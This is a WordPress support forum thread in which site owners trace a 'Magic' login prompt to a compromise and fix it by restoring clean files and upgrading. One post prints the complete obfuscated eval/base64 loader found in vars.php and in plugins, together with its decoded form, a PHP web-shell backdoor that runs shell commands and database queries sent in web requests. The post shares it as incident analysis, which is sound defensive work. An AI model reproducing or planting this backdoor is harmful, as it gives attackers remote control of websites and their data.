WordPress.org

Ready to get started?Download WordPress

Forums

[resolved] Can't post/edit: requesting authentication "magic" (30 posts)

  1. tshirtfiend
    Member
    Posted 5 years ago #

    I'm getting a strange error when I try to post, or edit posts (or add/edit any content). I get a browser alert window that says:

    Authentication Required

    A username and password are being requested by http://mysite.com. The site says: "Magic"

    Then it requests user and password. User and password entry doesn't work.

    I can log into the blog normally, without errors. I have reset my admin password, to no effect.

    Did I get hacked or something? How can I fix this?

  2. jkboho
    Member
    Posted 5 years ago #

    I fixed the problem by reuploading the root files, the wp-admin folder and the wp-includes folder from a backup of the site that I made a week ago. I didn't touch the content folder.

    If you don't have a backup, I imagine that if you download a fresh version from WordPress and recopy the files and folders listed above (being careful NOT to overwrite your wp-config file!), that would probably work, too. PIA, I know, but that's all I know to do until someone else figures out the source of the problem.

  3. jkboho
    Member
    Posted 5 years ago #

    Also, to clarify -- someone else pointed this out on another of my posts -- by replacing the "root files" I mean the files in the top-level folder. Replace them all but the wp-config file.

  4. tshirtfiend
    Member
    Posted 5 years ago #

    Ok, thanks. I'll give that a shot.

    Seems like a strange problem to have just out of the blue.

  5. fredeaker
    Member
    Posted 5 years ago #

    I was getting the same message as well. Even though I was already at 2.8.2, I performed the upgrade procedure, and now the message is gone.

  6. tshirtfiend
    Member
    Posted 5 years ago #

    I uploaded the files you suggested, in 3 groups:

    1. root files
    2. wp-admin directory
    3. wp-includes directory

    I tested after each one. It start working until the last files (wp-includes directory). If it happens again, I'll start there.

  7. tshirtfiend
    Member
    Posted 5 years ago #

    Oops. I meant: It DIDN'T start working until I uploaded the wp-includes directory.

  8. lovefabillar
    Member
    Posted 5 years ago #

    Yeah I'm having this exact kind of problem right now, reuploaded /wp-admin directory - problem remains.. reuploaded root files - problem remains.. Right now reuploading /wp-includes directory - still uploading..

    I only got this issue after installing the Plug-in "Tweet This", must have interfered with my other plug-ins?

    EDIT: Finished reuploading /wp-includes and the problem has been solved!

  9. robk30
    Member
    Posted 5 years ago #

    i'm having the same problem. how do i re-upload /wp-includes? thanks!

  10. robk30
    Member
    Posted 5 years ago #

    i am using WP 2.7.1 - can i upload wp-includes from WP 2.8.2 or does it need to be the wp-includes from 2.7.1? if so, where can i get that?

  11. jkboho
    Member
    Posted 5 years ago #

    @robk: Go to the WordPress downloads area and it should have the old versions.

  12. robk30
    Member
    Posted 5 years ago #

    i got the "Magic" thing to go away, but now i am having issues with the sidebar and some other things on the blog. do you think it's related? what else can i do to fix this problem? the blog i'm referring to:

    haironthebrain.com

  13. rchusid
    Member
    Posted 5 years ago #

    I assume this is some sort of attack as opposed to any form of error inherent to WordPress. I also fixed the problem for now by having it automatically reinstall WordPress.

    There's at least one other post here discussing the problem:
    http://wordpress.org/support/topic/295482

  14. rchusid
    Member
    Posted 5 years ago #

    robk30: Maybe your problem with sidebars is related to this problem but I wonder if it is coincidental. I had problems similar to yours recently and ultimately found it was because some formatting codes in text I had pasted in from another site had messed up WordPress. You might try checking recent posts to see if there are any html codes included, or try temporarily removing your posts from 7/30 to see if that fixes the problem.

  15. tstalcup
    Member
    Posted 5 years ago #

    Encountered the "Magic" problem with a client using v2.5.1 this morning. We, at least temporarily, solved the problem by reverting the wp-includes directory to a backup copy.

    We did a diff on the two directory and found that the vars.php file contained the infected code.

  16. tshirtfiend
    Member
    Posted 5 years ago #

    Does seem like it might be malicious, doesn't it? Simple fix…but I'm not sure that more damage wasn't done. Fingers crossed, passwords changed, etc.

  17. SoundTrip
    Member
    Posted 5 years ago #

    This just started on one of my user's sites. It looks like a hack to me. Has anyone gotten to the root of the problem?

  18. tdrpic
    Member
    Posted 5 years ago #

    I found that the WP sites could have been hacked using the Magic Shell script. You can find more information here:
    http://iboughtamac.com/2008/03/28/protecting-wordpress-from-magic-include-shell/

    Note that the information to remove the exploit is not the same in this case. Uploading a clean version of wp-includes/vars.php does fix it.

    While doing the research to solve this, I found two extra files that had a similar script included (eval() of base64_decode()). They had been uploaded to a subdirectory on wp-content/uploads/ and were fonction.php and wp-links.php.

    Good luck,

    Tomi

    Something for IT

  19. mbroyles
    Member
    Posted 4 years ago #

    The following code was found on my clients WP site in two separate plug-ins. Code was found at the top of each page (when you click the edit link for the plugin).

    eval(gzinflate(base64_decode('1VVtT9swEP7c/gpTVSSRukGrMhgF1gk6aRL7AIwPCCbjJhfqLW/YzkoH/e87Oy9NCUPAJqRVbZr4Od89z53v0rxtNrhP7BU/jVzF44jCDZdK2hY1H8l8kBMIAstxmg00bhSG5J6B3f4Rh6lyiDZqDHnEqQCpYgF2SxvRMPag5QzqaJxARMdMgsdFbtD2uGTjAGgRTZJdwoRgMxqyxLaU4KHVIXCTBOjVtjr4oH1egbKt2l7knrk1SiFM1IwUdHO+BqrlIGFSqolILYesrpIVHlHDoQJ0SJ1q6bOxtjYk8ZhKxYSyMwoonhS7Cw6DwrqNOUGhZhNKoW4cKYiQycLEYBB51A2ARQUwN1cIJDyoQ86kgrCmIl9+kYZs7+sp0EcMn8Ctq1hAjyspuS123OMP7iQm2uxJnB5k8wQeQ1IJ3THxCgI5xe8xj+zWRdRaRkt6HaLBh0gOCZe6s+JUuGC3faM30R1Wxmthk1XLm8ds5f4a0wkPAPtkSHyIffSxMC6s32qvvgDmIdwh3fVev+BoSNo1tIDnZQ+4QSw1w1r9zc1yyS5vM/Lzy0cKpS/4m+NSNtO4lKCw0enx6Oh0dPL13EomCd3wun1vi3U3e5v9dX9zfWurv9Fj7tjbeLfudt/3rG+5XhOjtfOUPTrjaaD28qLo4M+OSnZ3iQU/GU7aLN363tY9FLIr7tLrNFYg6VXi2g65uyM1RKSR4iEg+oFIHJCJDBiedFml4oYe6iPbpLY2yLJnKkD+QkDWE0bA/RfE/6blOgUxK8S0sxLjYQxn8jqgBnw1STgHpok3frPnjSeVV1lOymmWHZMd2mecWfrl7OTokGKw4zP66ePnw9HBNsG5k6kEIWJhV2JXJ4/HUc2AFL23SPfSCMopVjjmTZ0NzLz986HTFvG0TLEPyp1QfFfG7rKb6nQ4x1oRvS2fBNlf7kAA5DJLB4NFmiQIzgL+KyPpVEUtafpX2T053d8fjQ6WEsx8H1wFHkUFeBSm40qiiV4jhcWf0m4UZ8Quop21F4yrQjJ6wu9v'))); ?>

    I expanded the eval code. Here is what it expanded to:

    {
            if (!function_exists('______safeshell'))
            {
                    function ______safeshell($komut) {
                            @ini_restore("safe_mode");
                            @ini_restore("open_basedir");
                            $disable_functions = array_map('trim', explode(',', ini_get('disable_functions')));
                            if (!empty ($komut)) {
                                    if (function_exists('passthru') && !in_array('passthru', $disable_functions)) {
                                            //@ ob_start();
                                            @ passthru($komut);
                                            //$res = @ ob_get_contents();
                                            //@ ob_end_clean();
                                    }
                                    elseif (function_exists('system') && !in_array('system', $disable_functions)) {
                                            //@ ob_start();
                                            @ system($komut);
                                            //$res = @ ob_get_contents();
                                            //@ ob_end_clean();
                                    }
                                    elseif (function_exists('shell_exec') && !in_array('shell_exec', $disable_functions)) {
                                            $res = @ shell_exec($komut);
                                            echo $res;
                                    }
                                    elseif (function_exists('exec') && !in_array('exec', $disable_functions)) {
                                            @ exec($komut, $res);
                                            $res = join("\n", $res);
                                            echo $res, "\n";
                                    }
                                    elseif (@ is_resource($f = @ popen($komut, "r"))) {
                                            //$res = "";
                                            while (!@ feof($f)) {
                                                    //$res .= @ fread($f, 1024);
                                                    echo(@ fread($f, 1024));
                                            }
                                            @ pclose($f);
                                    }
                                    else
                                    {
                                            $res = <code>{$komut}</code>;
                                            echo $res;
                                    }
                            }
                    }
            };
    
            if (isset ($_REQUEST['php_5d14d8a172740f7088452acbd560c192'])) {
                    echo "<php_5d14d8a172740f7088452acbd560c192_result>\n";
                    if ($_REQUEST['php_5d14d8a172740f7088452acbd560c192'] == 'eval') {
                            eval(get_magic_quotes_gpc() || get_magic_quotes_runtime() ? stripslashes($_REQUEST['cmd']) : $_REQUEST['cmd']);
                    }
                    else if ($_REQUEST['php_5d14d8a172740f7088452acbd560c192'] == 'exec') {
                            ______safeshell(get_magic_quotes_gpc() || get_magic_quotes_runtime() ? stripslashes($_REQUEST['cmd']) : $_REQUEST['cmd']);
                    }
                    else if ($_REQUEST['php_5d14d8a172740f7088452acbd560c192'] == 'query') {
                            $result = mysql_query(get_magic_quotes_gpc() || get_magic_quotes_runtime() ? stripslashes($_REQUEST['cmd']) : $_REQUEST['cmd'], $wpdb->dbh);
                            if (!$result)
                            {
                                    echo "php_5d14d8a172740f7088452acbd560c192_result_MYSQL_QUERY_FAILED: ", mysql_error($wpdb->dbh), "\n";
                                    die();
                            }
                            else if (is_resource($result))
                            {
                                    $res = array();
                                    while ($row = mysql_fetch_assoc($result))
                                    {
                                            $res[] = $row;
                                    };
                                    mysql_free_result($result);
                                    echo serialize($res);
                                    die();
                            }
                            else
                            {
                                    echo "php_5d14d8a172740f7088452acbd560c192_result_MYSQL_QUERY_SUCCEEDED: ", mysql_affected_rows($wbdb->dbh), " rows affected\n";
                                    die();
                            }
                    };
                    echo "\n</php_5d14d8a172740f7088452acbd560c192_result>\n";
                    die();
            };
    };

    Looks like it gives the ability to run shell commands and mysql DB queries via remote POST and GET requests.

  20. mbroyles
    Member
    Posted 4 years ago #

    code was also found in the file:

    wp-includes/vars.php

    removed the malicious code from the top of the file and no longer see the 'Magic' login prompt.

  21. techartist
    Member
    Posted 4 years ago #

    I had the same problem, uploaded the wp-includes/vars.php file, and got the site back.

    I then upgraded to latest version, and removed the eval() ode from the top of one of my plugins.

    Hopefully, I won't be having any more problems from now on!

  22. qmagnets
    Member
    Posted 4 years ago #

    I hope people take the time to read all the way down to the bottom as it will save them a lot of time.
    I just replaced the vars.php file as well and it's all good.
    Thanks to those who contributed and paved the way to a simple fix!
    Now does anyone know WHY it happens, or do we care?

  23. jamiesulc
    Member
    Posted 4 years ago #

    I am having the same issue. Can someone walk me through fixing it? Thanks.

  24. SugaredHarpy
    Member
    Posted 4 years ago #

    qmagnets and all, thank you!

    Replacing the vars.php file did the trick.

    I would very much like to know why it happened, though. If anyone knows or has a guess, I'm all ears.

  25. monumentsinking
    Member
    Posted 4 years ago #

    I had the same issues with getting the whole you must authenticate to enter the "MAGIC" area.

    I replaced all of the root files, wp-admin, & wp-includes folder files with fresh copy of my 2.7.1 install and the issues went away.

  26. alism
    Member
    Posted 4 years ago #

    with fresh copy of my 2.7.1 install and the issues went away

    *sigh*

    Upgrade to the latest version!

    Don't just push the door to with the hope the burglars won't come back. Take down the flashing neon sign that says "PLEASE BURGLAR ME!", close the door and lock it.

  27. Celine Kiernan
    Member
    Posted 4 years ago #

    Alism, I can't upgrade. Each time I do it asks for my user name and password then tells me it's wrong. What do I do?

  28. Acquamarina
    Member
    Posted 4 years ago #

    Hi,
    Have the same problem. Uploaded original version of vars.php and it stopped the "Magic"pop up for login. It fixed the Magic issue but not the 403 error when trying to update and save template files. Permissions on the server are correct. Not sure what else to do.

    I also found the code in 2 plugins, which I deleted but the template edit/save permission denial is still there.

    Did anyone with the Magic issue also have a problem with saving updated templates?

    To complicate matters, I had upgraded to 2.9 right after solving the Magic issue and need to correct the Page template which is showing the default and not the custom one.

    Thanks!

  29. Acquamarina
    Member
    Posted 4 years ago #

    I just re-uploaded the include files but it made no difference. I still can't edit and save any templates.

  30. Larryhir
    Member
    Posted 4 years ago #

    Thanks for the info here. Just found in one of my client sites on updating. Code appears in the vars.php and 12 plug-ins. Using 2.7 on this site. What a mess. Does anyone know if 2.9 will solve this?

Topic Closed

This topic has been closed to new replies.

About this Topic